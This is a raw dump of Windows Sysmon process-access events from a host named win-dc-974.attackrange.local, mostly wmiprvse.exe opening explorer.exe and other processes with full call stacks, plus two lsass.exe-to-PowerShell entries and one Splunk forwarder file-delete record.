16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-61F0-603E-D5A8-00000000AD01}15988C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242948Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242947Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242946Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242945Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5F20-603E-79A8-00000000AD01}12472C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242944Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DF5-603E-54A8-00000000AD01}9088C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242943Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5DB8-603E-4BA8-00000000AD01}8092C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242942Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C8D-603E-26A8-00000000AD01}9012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242941Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5C50-603E-1DA8-00000000AD01}10544C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242940Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5B25-603E-F8A7-00000000AD01}6192C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242939Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5AE8-603E-EFA7-00000000AD01}7872C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242938Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-5A8B-603E-E3A7-00000000AD01}11288C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242937Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-CAA7-00000000AD01}15144C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242936Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59D7-603E-C9A7-00000000AD01}15528C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002242935Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88B234C9D6B7F7065DB8EAE404714651,SHA256=CD4039DAE9C050C5DCD948FA40238A9110319A33A7EC97FC4852D719023A2659,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002242934Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59C3-603E-C8A7-00000000AD01}15472C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242933Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59BE-603E-C3A7-00000000AD01}15012C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242932Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-59B2-603E-BEA7-00000000AD01}16180C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242931Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242930Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6DD3-603E-D8AA-00000000AD01}14280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002242929Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:43.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002242928Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 